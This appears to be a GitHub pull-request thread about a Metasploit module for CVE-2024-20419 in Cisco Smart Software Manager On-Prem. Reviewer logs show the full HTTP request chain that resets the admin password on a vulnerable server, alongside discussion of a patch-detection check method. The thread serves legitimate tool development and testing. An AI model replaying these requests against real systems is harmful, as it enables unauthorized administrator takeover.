Cisco Smart Software Manager (SSM) On-Prem Account Takeover (CVE-2024-20419) Module

[h4x-x0r]

This is a new module which exploits an account takeover vulnerability in Cisco Smart Software Manager (SSM) On-Prem <= 8-202206 (CVE-2024-20419), by changing the password of the admin user to an attacker-controlled one.

Verification Steps

1. Download the application from the vendor.
2. Deploy it by following the vendor's installation guide.
3. Start msfconsole
4. use auxiliary/admin/http/cisco_ssm_onprem_account
5. set RHOSTS <IP>
6. set SSL true
7. run

A new password (currently hardcoded to Testbaaasab@123456780) should have been set for the admin account.

msf6 > use auxiliary/admin/http/cisco_ssm_onprem_account 
msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > set RHOSTS 192.168.137.200
msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > set SSL true
msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > exploit 
[*] Running module against 192.168.137.200

[*] Starting workflow...
[+] Server reachable.
[*] xsrf_token: B%2BxNjt72KTh%2BW%2FYhUkSFpTKE5uM1NUkZdBMkle5C1DDpr9P9lPyPDN556BImuPHfSsdy4W4blO8R%2BvtX%2FLK%2B1A%3D%3D
[*] xsrf_token: B+xNjt72KTh+W/YhUkSFpTKE5uM1NUkZdBMkle5C1DDpr9P9lPyPDN556BImuPHfSsdy4W4blO8R+vtX/LK+1A==
[*] _lic_engine_session: f517481befa8b1a7cddcb1d755b8163c
[+] Server reachable.
[*] auth_token: 21bf4695d594af3bd5f0f07db2ce8f09f29abe6f9295e2649e3fa5f266ada2a1
[+] Server reachable.
[*] Auxiliary module execution completed

Successfully tested on

• Cisco Smart Software Manager v8-202206

[h4x-x0r]

Added error handling and made the code cleaner:

msf6 > use auxiliary/admin/http/cisco_ssm_onprem_account 
msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > set RHOSTS 192.168.137.200
RHOSTS => 192.168.137.200
msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > exploit 
[*] Running module against 192.168.137.200

[+] Server reachable.
[+] Retrieved XSRF Token: ZC4gteysvPfdyE1ptGLxAf8L5P/YRinaBpr8vrMjVvGNIbHFyfmEGeoMRjmYDS2pxMU1dopq/PDG4A33H5n84Q==
[+] Retrieved _lic_engine_session: a585c40891118ca34bfc0d9203bb5d7e
[+] Retrieved auth_token: 5ac1a8f9d8572bb2f9804fa90c6f9a52589ec6905cf863ea76af22d482228b23
[+] Password for the admin user was successfully updated: F7bTlBUiD62LaHmD!
[+] Login at: http://192.168.137.200:8443/#/logIn?redirectURL=%2F
[*] Auxiliary module execution completed

[dwelch-r7]

Thanks for the PR, is it possible to add in a check method?

[h4x-x0r]

Thanks for the PR, is it possible to add in a check method?

Thank you for reviewing the PR!

If I remember correctly, I didn't see an endpoint that returned version information for fingerprinting. Did you see one that I could add?

[bwatters-r7]

This is an initial draft of a working PoC
@h4x-x0r is this ready, now?

[h4x-x0r]

This is an initial draft of a working PoC
@h4x-x0r is this ready, now?

Yes, I forgot to update the description from the original post. I've removed that part - the module should be good to go. :)

[jheysel-r7]

Hey @h4x-x0r, thanks for the module! I attempted to download the vulnerable version from Cisco but it appears it's no longer available.

Would you be able to send the vulnerable .iso to msfdev@metasploit.com? That would be greatly appreciated!

Once I get the vulnerable version installed I'd be happy to try and help write a check method, there might be a way to identify whether or not the target has been patched without obtaining version info. Thanks!

[h4x-x0r]

Hey @h4x-x0r, thanks for the module! I attempted to download the vulnerable version from Cisco but it appears it's no longer available.

Would you be able to send the vulnerable .iso to msfdev@metasploit.com? That would be greatly appreciated!

Once I get the vulnerable version installed I'd be happy to try and help write a check method, there might be a way to identify whether or not the target has been patched without obtaining version info. Thanks!

That's unfortunate; Getting the affected software from a vendor seems always to be the biggest issue..
It is too big to send by email (around 3GB if I remember correctly), but I'll reach out shortly.

Perhaps I could install a newer version which is patched, and see how the response differs when the relevant endpoints are queried, although it might not be too reliable across many different versions. Are you aware of some existing MSF modules that follow a similar approach for fingerprinting, in case the version information cannot be obtained directly from an unauthenticated context?

On a related note - I have a couple modules that exploit vulnerabilities in hardware devices (router, switches, embedded servers, printers, etc.). I either had access to the hardware, or in some cases, I did user-mode emulation or full system emulation to get the targets running, but the process is usually quite involved or may rely on custom code that I created to get it working (i.e., you might not have access to the vulnerable product to run the module against). In such cases, is the module code, documentation and console output of a successful run still sufficient to get it merged when I submit a PR?

[jheysel-r7]

It is too big to send by email (around 3GB if I remember correctly), but I'll reach out shortly.

Would you maybe be able to upload it to Google Drive and then email the link?

Perhaps I could install a newer version which is patched, and see how the response differs when the relevant endpoints are queried, although it might not be too reliable across many different versions. Are you aware of some existing MSF modules that follow a similar approach for fingerprinting, in case the version information cannot be obtained directly from an unauthenticated context?

Yea! That's exactly what I was going to experiment with. Look for the differences in response codes/ response bodies between the patched and unpatched versions.

Here's an example of a check method checking for the presence of the patch via HTTP response codes and header values instead of version info:

metasploit-framework/modules/exploits/multi/http/cve_2021_35464_forgerock_openam.rb

Lines 79 to 94 in 25ee41d

	def check
	res = send_request_cgi(
	'method' => 'POST',
	'uri' => normalize_uri(target_uri.path, '/oauth2/..;/ccversion/Version'),
	'vars_post' => {
	'jato.pageSession' => Base64.urlsafe_encode64(rand_text_alphanumeric(6..13))
	}
	)
	if res.nil?
	CheckCode::Unknown("The target server didn't respond!")
	elsif res.code == 302 && res.headers['Location']&.end_with?('/base/AMInvalidURL')
	CheckCode::Appears
	else
	CheckCode::Safe
	end
	end

Here's another example that's not HTTP related.

metasploit-framework/modules/exploits/multi/http/apache_couchdb_erlang_rce.rb

Lines 129 to 146 in 609d356

	def check
	erlang_ports = get_erlang_ports
	# If get_erlang_ports does not return an array of port numbers, the target is not vulnerable.
	return Exploit::CheckCode::Safe('This endpoint does not appear to expose any erlang ports') if erlang_ports.empty?
	erlang_ports.each do |erlang_port|
	# If connect_to_erlang_server returns a socket, it means authentication with the default cookie has been
	# successful and the target as well as the specific socket used in this instance is vulnerable
	sock = connect_to_erlang_server(erlang_port.to_i)
	if sock.instance_of?(Socket)
	@vulnerable_socket = sock
	return Exploit::CheckCode::Vulnerable('Successfully connected to the Erlang Server with cookie: "monster"')
	else
	next
	end
	end
	Exploit::CheckCode::Safe('This endpoint has an exposed erlang port(s) but appears to be a patched')
	end

In such cases, is the module code, documentation and console output of a successful run still sufficient to get it merged when I submit a PR?

In those cases we do always prefer if you can either send the software for us to test or in the case of qemu user emulation if you can write out the steps you took to setup the target. Like what was done here:

metasploit-framework/documentation/modules/exploit/linux/http/qnap_qts_rce_cve_2023_47218.md

Lines 16 to 116 in 6c252de

	### Setup
	Vulnerable firmware can be downloaded from:
	[TS-X64_20230926-5.1.2.2533.zip](https://download.qnap.com/Storage/TS-X64/TS-X64_20230926-5.1.2.2533.zip)
	In order to decrypt the firmware use the following script:
	[qnap-qts-fw-cryptor.py](https://gist.github.com/ulidtko/966277a465f1856109b2d2674dcee741)
	Unzip the archive:
	```
	user@dev:~/qnap/$ unzip TS-X64_20230926-5.1.2.2533.zip
	Archive: TS-X64_20230926-5.1.2.2533.zip
	inflating: TS-X64_20230926-5.1.2.2533.img
	```
	Decrypt the firmware:
	```
	user@dev:~/qnap/$ python3 qnap-qts-fw-cryptor.py d QNAPNASVERSION5 TS-X64_20230926-5.1.2.2533.img TS-X64_20230926-5.1.2.2533.tgz
	Signature check OK, model TS-X64, version 5.1.2
	Encrypted 1048576 of all 220239236 bytes
	[99% left]
	[99% left]
	[99% left]
	...snip
	[02% left]
	[00% left]
	[00% left]
	user@dev:~/qnap/$ ls
	qnap-qts-fw-cryptor.py TS-X64_20230926-5.1.2.2533.img TS-X64_20230926-5.1.2.2533.tgz TS-X64_20230926-5.1.2.2533.zip
	```
	Recreate the root file system:
	```
	user@dev:~/qnap/$ mkdir firmware
	user@dev:~/qnap/$ tar -xvzf TS-X64_20230926-5.1.2.2533.tgz -C ./firmware/
	user@dev:~/qnap/$ binwalk -e firmware/initrd.boot
	user@dev:~/qnap/$ binwalk -e firmware/_initrd.boot.extracted/0
	user@dev:~/qnap/$ binwalk -e firmware/rootfs2.bz
	user@dev:~/qnap/$ binwalk -e firmware/_rootfs2.bz.extracted/0
	user@dev:~/qnap/$ mv firmware/_rootfs2.bz.extracted/_0.extracted/* firmware/_initrd.boot.extracted/_0.extracted/cpio-root/
	```
	To run the Firmware first copy the qemu-x86_64-static binary into the root file system folder:
	```
	user@dev:~/qnap/$ cd firmware/_initrd.boot.extracted/_0.extracted/cpio-root/
	user@dev:~/qnap/firmware/_initrd.boot.extracted/_0.extracted/cpio-root$ cp $(which qemu-x86_64-static) .
	```
	Run _thttpd_ via QEMU:
	```
	user@dev:~/qnap/firmware/_initrd.boot.extracted/_0.extracted/cpio-root$
	sudo chroot . ./qemu-x86_64-static usr/local/sbin/_thttpd_ -p 8080 -nor -nos -u admin -d /home/httpd -c '**.*' -h 0.0.0.0 -i /var/lock/._thttpd_.pid
	```
	Verify the HTTP server is running:
	```
	user@dev:~/qnap/firmware/_initrd.boot.extracted/_0.extracted/cpio-root$ sudo netstat -lnp | grep 8080
	tcp 0 0 0.0.0.0:8080 0.0.0.0:* LISTEN 1195417/./qemu-x86_
	```
	At the time of writing `/dev/random` and `/dev/urandom` are required to be present in the environment in order to work
	around the following issue: https://github.com/rapid7/mettle/issues/255.
	Ensure the binaries exist on your system:
	```
	user@dev:~/qnap/firmware/_initrd.boot.extracted/_0.extracted/cpio-root$ ls /dev/random
	/dev/random
	user@dev:~/qnap/firmware/_initrd.boot.extracted/_0.extracted/cpio-root$ ls /dev/urandom
	/dev/urandom
	```
	Create files the files:
	```
	user@dev:~/qnap/firmware/_initrd.boot.extracted/_0.extracted/cpio-root$ touch dev/random
	user@dev:~/qnap/firmware/_initrd.boot.extracted/_0.extracted/cpio-root$ touch dev/urandom
	```
	Mount the binaries:
	```
	user@dev:~/qnap/firmware/_initrd.boot.extracted/_0.extracted/cpio-root$ sudo mount --bind /dev/random dev/random
	user@dev:~/qnap/firmware/_initrd.boot.extracted/_0.extracted/cpio-root$ sudo mount --bind /dev/urandom dev/urandom
	```
	Drop to a shell via QEMU:
	```
	user@dev:~/qnap/firmware/_initrd.boot.extracted/_0.extracted/cpio-root$ sudo chroot . /bin/sh
	```
	Enable the component quick.cgi:
	```
	sh-3.2# chmod +x /home/httpd/cgi-bin/quick/quick.cgi
	```
	Fix a linker issue with QEMU:
	```
	sh-3.2# rm /lib/libnl-3.so.200
	sh-3.2# ln -s /lib/libnl-3.so.200.24.0 /lib/libnl-3.so.200
	```
	Create this folder as it will be present in a NAS device containing a hard drive:
	```
	sh-3.2# mkdir /mnt/HDA_ROOT
	```

That way other users can test the module and if any future work needs to be done on the module we have a guide on how to setup a test target.

If you write a module for a physical device and there's no way for us to verify the module works/ setup a test target on our end we can accept a .pcap file of the exploit working. Although if possible we do prefer to have the documentation file list the steps necessary to setup a test target.

[h4x-x0r]

@jheysel-r7 I've sent two emails (the day before yesterday and yesterday), just wanted to check if you got them.

[h4x-x0r]

No problem, I've forwarded them to you directly.

[jheysel-r7]

Hey @h4x-x0r, thanks for the great module. A couple minor comments. Testing was as expected 👍

Check Method

I'd first suggest refactoring the four requests that are sent in the run method into their own methods because you'll need most of that functionality in the check method.

We want to avoid sending all 4 requests twice, so we can create instance variables in the check method like so:

@xsrf_token_value = get_xsrf_token_value

But because users have the ability to disable the check method it's not guaranteed they'll get set in the check method so we can use a conditional assignment operator in the run method to set the instances variables if they're nil.

@xsrf_token_value ||= get_xsrf_token_value

A good example of this pattern can be found here:

metasploit-framework/modules/exploits/multi/http/apache_rocketmq_update_config.rb

Lines 125 to 129 in 429eaff

	@version_request_response ||= send_version_request
	@parsed_data ||= parse_rocketmq_data(@version_request_response)
	@broker_port = get_broker_port(@parsed_data, datastore['rhost'], default_broker_port: datastore['BROKER_PORT'])
	print_status("Executing target: #{target.name} with payload #{datastore['PAYLOAD']} on Broker port: #{@broker_port}")
	execute_command("-c $@|sh . echo bash -c '#{payload.encoded}'", { broker_port: @broker_port })

I've included output from a vulnerable and non-vulnerable target. It looks like if the check method gets the xsrf_token and the auth_token it should be able to send a request to /backend/reset_password and a patched target will respond with:
{"error":"Invalid Access","error_message":"Invalid Access"} where as a vulnerable target will respond with: {"status":"OK"}.

It's a bit of an invasive check method as it's exploiting the vuln and reseting the password, they're might be better way.

Vulnerable Cisco SSM 8

msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > run
[*] Running module against 172.16.199.40

####################
# Request:
####################
GET /backend/settings/oauth_adfs?hostname=luLnhy HTTP/1.1
Host: 172.16.199.40:8443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.4; rv:124.0) Gecko/20100101 Firefox/124.0


####################
# Response:
####################
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 29 Aug 2024 21:33:34 GMT
Content-Type: application/json; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN, DENY
X-XSS-Protection: 1; mode=block, 1; mode=block
X-Content-Type-Options: nosniff, nosniff
X-Download-Options: noopen
X-Permitted-Cross-Domain-Policies: none
Referrer-Policy: strict-origin-when-cross-origin
X_CSL_CONNECT_INFO: {"name"=>"SSM", "version"=>"1.4", "additional_info"=>"", "production"=>true, "capabilities"=>["MULTITIER", "EXPORT_2", "DLC"]}
X_CSL_AGENT_ACTIONS:
X_CSL_NONCE:
X_CSL_TIMESTAMP: 1724967214846
X_CSL_MESSAGE_VERSION: 1.3
ETag: W/"9082ef92676a7e2e1348fd860dd9af23"
Cache-Control: max-age=0, private, must-revalidate
Set-Cookie: XSRF-TOKEN=2ZpLB7O8L22gEgIGUwxfaniDMQANjhtR9xnXq5oTZeGk1kOMxBRV%2B88arzv7F9qZ5Au3vsFQS2eh7BmAQzm%2FiA%3D%3D; path=/, _lic_engine_session=41457e8c3072e315668f818961607fd5; path=/; HttpOnly
X-Request-Id: 7d18818c-4899-4b5d-aedb-f87918ed62aa
X-Runtime: 0.009177
Vary: Origin
Strict-Transport-Security: max-age=63072000; includeSubdomains; preload

{"enabled":false,"redirect":"https://luLnhy:8443/backend/auth/adfs"}
[+] Server reachable.
[+] Retrieved XSRF Token: 2ZpLB7O8L22gEgIGUwxfaniDMQANjhtR9xnXq5oTZeGk1kOMxBRV+88arzv7F9qZ5Au3vsFQS2eh7BmAQzm/iA==
####################
# Request:
####################
POST /backend/reset_password/generate_code HTTP/1.1
Host: 172.16.199.40:8443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.4; rv:124.0) Gecko/20100101 Firefox/124.0
Cookie: XSRF-TOKEN=2ZpLB7O8L22gEgIGUwxfaniDMQANjhtR9xnXq5oTZeGk1kOMxBRV%2B88arzv7F9qZ5Au3vsFQS2eh7BmAQzm%2FiA%3D%3D; _lic_engine_session=41457e8c3072e315668f818961607fd5
X-Xsrf-Token: 2ZpLB7O8L22gEgIGUwxfaniDMQANjhtR9xnXq5oTZeGk1kOMxBRV+88arzv7F9qZ5Au3vsFQS2eh7BmAQzm/iA==
Content-Type: application/json
Content-Length: 15

{"uid":"admin"}
####################
# Response:
####################
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 29 Aug 2024 21:33:34 GMT
Content-Type: application/json; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN, DENY
X-XSS-Protection: 1; mode=block, 1; mode=block
X-Content-Type-Options: nosniff, nosniff
X-Download-Options: noopen
X-Permitted-Cross-Domain-Policies: none
Referrer-Policy: strict-origin-when-cross-origin
X_CSL_CONNECT_INFO: {"name"=>"SSM", "version"=>"1.4", "additional_info"=>"", "production"=>true, "capabilities"=>["MULTITIER", "EXPORT_2", "DLC"]}
X_CSL_AGENT_ACTIONS:
X_CSL_NONCE:
X_CSL_TIMESTAMP: 1724967214884
X_CSL_MESSAGE_VERSION: 1.3
ETag: W/"290c8043abcda9226d13c9088b82c312"
Cache-Control: max-age=0, private, must-revalidate
Set-Cookie: XSRF-TOKEN=JQxIs4XqBtpfs%2Fh5u0pLnoSEM8rwXDwlmXOjrMLpR%2BtYQEA48kJ8TDC7VUQTUc5tGAy1dDyCbBPPhm2HG8Odgg%3D%3D; path=/
X-Request-Id: 89365b5d-d64d-4f74-bbdc-fd42d3f32e86
X-Runtime: 0.022502
Vary: Origin
Strict-Transport-Security: max-age=63072000; includeSubdomains; preload

{"uid":"admin","auth_token":"5883d528a6b63559c8e9a96edefc1204bd57c8231b17097f125e1d5ea5f3de95"}
[+] Retrieved auth_token: 5883d528a6b63559c8e9a96edefc1204bd57c8231b17097f125e1d5ea5f3de95
####################
# Request:
####################
POST /backend/reset_password HTTP/1.1
Host: 172.16.199.40:8443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.4; rv:124.0) Gecko/20100101 Firefox/124.0
Cookie: XSRF-TOKEN=JQxIs4XqBtpfs%2Fh5u0pLnoSEM8rwXDwlmXOjrMLpR%2BtYQEA48kJ8TDC7VUQTUc5tGAy1dDyCbBPPhm2HG8Odgg%3D%3D; _lic_engine_session=41457e8c3072e315668f818961607fd5
X-Xsrf-Token: 2ZpLB7O8L22gEgIGUwxfaniDMQANjhtR9xnXq5oTZeGk1kOMxBRV+88arzv7F9qZ5Au3vsFQS2eh7BmAQzm/iA==
Content-Type: application/json
Content-Length: 189

{"uid":"admin","auth_token":"5883d528a6b63559c8e9a96edefc1204bd57c8231b17097f125e1d5ea5f3de95","password":"!1jUbfF9a2dxknM0P!","password_confirmation":"!1jUbfF9a2dxknM0P!","common_name":""}
####################
# Response:
####################
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 29 Aug 2024 21:33:35 GMT
Content-Type: application/json; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN, DENY
X-XSS-Protection: 1; mode=block, 1; mode=block
X-Content-Type-Options: nosniff, nosniff
X-Download-Options: noopen
X-Permitted-Cross-Domain-Policies: none
Referrer-Policy: strict-origin-when-cross-origin
X_CSL_CONNECT_INFO: {"name"=>"SSM", "version"=>"1.4", "additional_info"=>"", "production"=>true, "capabilities"=>["MULTITIER", "EXPORT_2", "DLC"]}
X_CSL_AGENT_ACTIONS:
X_CSL_NONCE:
X_CSL_TIMESTAMP: 1724967215118
X_CSL_MESSAGE_VERSION: 1.3
ETag: W/"3d23d39a30bb7323f8ccfd64c52cf286"
Cache-Control: max-age=0, private, must-revalidate
Set-Cookie: XSRF-TOKEN=AEfDGh64qAc2ASfNzqSTlYC1ZV5WJY9cl2MyX2o0iGR9C8uRaRDSkVkJivBmvxZmHD3j4Jr732rBlvx0sx5SDQ%3D%3D; path=/
X-Request-Id: 9123f82b-762a-4a86-a3df-5cc14a1af28c
X-Runtime: 0.223049
Vary: Origin
Strict-Transport-Security: max-age=63072000; includeSubdomains; preload

{"status":"OK"}
####################
# Request:
####################
POST /backend/auth/identity/callback HTTP/1.1
Host: 172.16.199.40:8443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.4; rv:124.0) Gecko/20100101 Firefox/124.0
Cookie: XSRF-TOKEN=AEfDGh64qAc2ASfNzqSTlYC1ZV5WJY9cl2MyX2o0iGR9C8uRaRDSkVkJivBmvxZmHD3j4Jr732rBlvx0sx5SDQ%3D%3D; _lic_engine_session=41457e8c3072e315668f818961607fd5
X-Xsrf-Token: 2ZpLB7O8L22gEgIGUwxfaniDMQANjhtR9xnXq5oTZeGk1kOMxBRV+88arzv7F9qZ5Au3vsFQS2eh7BmAQzm/iA==
Accept: application/json
Content-Type: application/json
Content-Length: 52

{"username":"admin","password":"!1jUbfF9a2dxknM0P!"}
####################
# Response:
####################
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 29 Aug 2024 21:33:35 GMT
Content-Type: application/json; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN, DENY
X-XSS-Protection: 1; mode=block, 1; mode=block
X-Content-Type-Options: nosniff, nosniff
X-Download-Options: noopen
X-Permitted-Cross-Domain-Policies: none
Referrer-Policy: strict-origin-when-cross-origin
X_CSL_CONNECT_INFO: {"name"=>"SSM", "version"=>"1.4", "additional_info"=>"", "production"=>true, "capabilities"=>["MULTITIER", "EXPORT_2", "DLC"]}
X_CSL_AGENT_ACTIONS:
X_CSL_NONCE:
X_CSL_TIMESTAMP: 1724967215564
X_CSL_MESSAGE_VERSION: 1.3
ETag: W/"053537117e54842d118b2d083c3ca797"
Cache-Control: max-age=0, private, must-revalidate
Set-Cookie: XSRF-TOKEN=la%2Fc1B2m7jH%2Fb1SLfYR%2FJ1SIT9on4duQ4pcN8P4B70Do49Rfag6Up5Bn%2BbbVn%2FrUyADJZOs%2Fi6a0YsPbJys1KQ%3D%3D; path=/
X-Request-Id: 32f7e171-fd70-42d1-8949-6f41c0daf9dc
X-Runtime: 0.431364
Vary: Origin
Strict-Transport-Security: max-age=63072000; includeSubdomains; preload

{"provider":"identity","email":"","uid":"admin","first_name":"Local","last_name":"Admin","display_name":"Local Admin","organization":null,"country":"UNITED_STATES","language":"ENGLISH","description":null,"account_status":1,"role":"admin","individual_system_role":"admin","admin":"admin","id":1,"session_key":"68ac590bb05690cbb2ebacc9fcb1c15d5b19bb62ac39e8d33e3240ca25eb54bd","sso_user_id":null,"password_expires_in":null}
[+] Password for the admin user was successfully updated: !1jUbfF9a2dxknM0P!
[+] Login at: https://172.16.199.40:8443/#/logIn?redirectURL=%2F
[*] Auxiliary module execution completed

Patched Cisco SSM 9

msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > set rhost 172.16.199.201
rhost => 172.16.199.201
msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > rexploit
[*] Reloading module...
[*] Running module against 172.16.199.201

####################
# Request:
####################
GET /backend/settings/oauth_adfs?hostname=mznLWl HTTP/1.1
Host: 172.16.199.201:8443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.4; rv:124.0) Gecko/20100101 Firefox/124.0


####################
# Response:
####################
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 29 Aug 2024 21:33:54 GMT
Content-Type: application/json; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN, DENY
X-XSS-Protection: 1; mode=block, 1; mode=block
X-Content-Type-Options: nosniff, nosniff
X-Download-Options: noopen
X-Permitted-Cross-Domain-Policies: none
Referrer-Policy: strict-origin-when-cross-origin
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: 0
X_CSL_CONNECT_INFO: {"name"=>"SSM", "version"=>"1.4", "additional_info"=>"", "production"=>true, "capabilities"=>["MULTITIER", "EXPORT_2", "DLC"]}
X_CSL_AGENT_ACTIONS:
X_CSL_NONCE:
X_CSL_TIMESTAMP: 1724967234374
X_CSL_MESSAGE_VERSION: 1.3
ETag: W/"d38b0eae8cae5236d54cfce21dfdfc13"
Set-Cookie: XSRF-TOKEN=jk1GOsPi9SWb9GhOQJtjjYp9lZ3d2r3q4uNxCUY8WWKjBP4OkKmf5cbYeY5TkHFBjHSdDPpLTNg9HRChyroRcA%3D%3D; path=/; secure, _lic_engine_session=0e84f758847748e8f185cbd782272edf; path=/; secure; HttpOnly
X-Request-Id: 23786a7e-db94-43ab-a8e0-5e2bd3f1fad6
X-Runtime: 0.056111
Vary: Origin
Strict-Transport-Security: max-age=63072000; includeSubdomains; preload

{"enabled":false,"redirect":"https://mznLWl:8443/backend/auth/adfs"}
[+] Server reachable.
[+] Retrieved XSRF Token: jk1GOsPi9SWb9GhOQJtjjYp9lZ3d2r3q4uNxCUY8WWKjBP4OkKmf5cbYeY5TkHFBjHSdDPpLTNg9HRChyroRcA==
####################
# Request:
####################
POST /backend/reset_password/generate_code HTTP/1.1
Host: 172.16.199.201:8443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.4; rv:124.0) Gecko/20100101 Firefox/124.0
Cookie: XSRF-TOKEN=jk1GOsPi9SWb9GhOQJtjjYp9lZ3d2r3q4uNxCUY8WWKjBP4OkKmf5cbYeY5TkHFBjHSdDPpLTNg9HRChyroRcA%3D%3D; _lic_engine_session=0e84f758847748e8f185cbd782272edf
X-Xsrf-Token: jk1GOsPi9SWb9GhOQJtjjYp9lZ3d2r3q4uNxCUY8WWKjBP4OkKmf5cbYeY5TkHFBjHSdDPpLTNg9HRChyroRcA==
Content-Type: application/json
Content-Length: 15

{"uid":"admin"}
####################
# Response:
####################
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 29 Aug 2024 21:33:55 GMT
Content-Type: application/json; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN, DENY
X-XSS-Protection: 1; mode=block, 1; mode=block
X-Content-Type-Options: nosniff, nosniff
X-Download-Options: noopen
X-Permitted-Cross-Domain-Policies: none
Referrer-Policy: strict-origin-when-cross-origin
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: 0
X_CSL_CONNECT_INFO: {"name"=>"SSM", "version"=>"1.4", "additional_info"=>"", "production"=>true, "capabilities"=>["MULTITIER", "EXPORT_2", "DLC"]}
X_CSL_AGENT_ACTIONS:
X_CSL_NONCE:
X_CSL_TIMESTAMP: 1724967235145
X_CSL_MESSAGE_VERSION: 1.3
ETag: W/"313ec556206adb59fae3cf597925a1d7"
Set-Cookie: XSRF-TOKEN=krzro9yNkEDQp7MI7PS9UqmHC61MTF2yuCRuExbh3Da%2F9VOXj8b6gI2Losj%2F%2F6%2Ber44DPGvdrIBn2g%2B7mmeUJA%3D%3D; path=/; secure
X-Request-Id: fef68288-74e5-48a9-84f8-3b35aafeb03b
X-Runtime: 0.473530
Vary: Origin
Strict-Transport-Security: max-age=63072000; includeSubdomains; preload

{"uid":"admin","auth_token":"2b094fef9c914a53828ee74e0160c39c04664a4f026cb9bba48a36b66feb16c3"}
[+] Retrieved auth_token: 2b094fef9c914a53828ee74e0160c39c04664a4f026cb9bba48a36b66feb16c3
####################
# Request:
####################
POST /backend/reset_password HTTP/1.1
Host: 172.16.199.201:8443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.4; rv:124.0) Gecko/20100101 Firefox/124.0
Cookie: XSRF-TOKEN=krzro9yNkEDQp7MI7PS9UqmHC61MTF2yuCRuExbh3Da%2F9VOXj8b6gI2Losj%2F%2F6%2Ber44DPGvdrIBn2g%2B7mmeUJA%3D%3D; _lic_engine_session=0e84f758847748e8f185cbd782272edf
X-Xsrf-Token: jk1GOsPi9SWb9GhOQJtjjYp9lZ3d2r3q4uNxCUY8WWKjBP4OkKmf5cbYeY5TkHFBjHSdDPpLTNg9HRChyroRcA==
Content-Type: application/json
Content-Length: 189

{"uid":"admin","auth_token":"2b094fef9c914a53828ee74e0160c39c04664a4f026cb9bba48a36b66feb16c3","password":"!1jUbfF9a2dxknM0P!","password_confirmation":"!1jUbfF9a2dxknM0P!","common_name":""}
####################
# Response:
####################
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 29 Aug 2024 21:33:55 GMT
Content-Type: application/json; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN, DENY
X-XSS-Protection: 1; mode=block, 1; mode=block
X-Content-Type-Options: nosniff, nosniff
X-Download-Options: noopen
X-Permitted-Cross-Domain-Policies: none
Referrer-Policy: strict-origin-when-cross-origin
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: 0
X_CSL_CONNECT_INFO: {"name"=>"SSM", "version"=>"1.4", "additional_info"=>"", "production"=>true, "capabilities"=>["MULTITIER", "EXPORT_2", "DLC"]}
X_CSL_AGENT_ACTIONS:
X_CSL_NONCE:
X_CSL_TIMESTAMP: 1724967235227
X_CSL_MESSAGE_VERSION: 1.3
ETag: W/"f66db6cb240b6ce9d3427f6b845d8716"
Set-Cookie: XSRF-TOKEN=PoHLG%2FkyL8Zgv2FMOVqVnkrcb8gcY0SixuCKUFAqTxITyHMvqnlFBj2TcIwqUYdSTNVnWTvytZAZHuv43KwHAA%3D%3D; path=/; secure
X-Request-Id: ff2f7cb4-555c-4ce0-a49e-92326972b401
X-Runtime: 0.051686
Vary: Origin
Strict-Transport-Security: max-age=63072000; includeSubdomains; preload

{"error":"Invalid Access","error_message":"Invalid Access"}
[-] Auxiliary aborted due to failure: unexpected-reply: Invalid Access
[*] Auxiliary module execution completed
msf6 auxiliary(admin/http/cisco_ssm_onprem_account) >

Testing

After I was able to log in into the application with the password in the NEW_PASSWORD datastore option.

msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > rexploit
[*] Reloading module...
[*] Running module against 172.16.199.40

[+] Server reachable.
[+] Retrieved XSRF Token: foPj5oBEWs/Pbc5epBuLIW/22ionCaJv5R1c+IO7rpkFaWsERZZXEiG8FU+OmhM0meDWgS/Psc27Lx0LJorb6Q==
[+] Retrieved auth_token: 25ed4c1377c5e68b6740d010663f4a95ec2074c2ce37f0b7c904dc9093365ea2
[+] Password for the admin user was successfully updated: !1jUbfF9a2dxknM0P!
[+] Login at: https://172.16.199.40:8443/#/logIn?redirectURL=%2F
[*] Auxiliary module execution completed

[h4x-x0r]

@jheysel-r7 Thank you for your review and feedback, much appreciated. Also apologies for my late reply.

I still need to review the check method based on your suggestions. The current draft sends the requests twice, but I'll update it later, using instance variables like you recommended.

Your output of the vulnerable and patched version was helpful. I've also installed a patched version, and confirmed that it generally works:

msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > check

[+] Server reachable.
[+] Retrieved XSRF Token: ndvhxhaiMjLos6cRnXViA1h4A5l9Nc3poEYZ7ItUoVrehK/8pnk/gSrzx47Wz1vL3rJryzs3g9b8hyMtyAuXrg==
[+] Retrieved auth_token: b0dac3cb0a41ce001d908d05e8f6959a161a4b03d6eb571f7b859876c49340f7
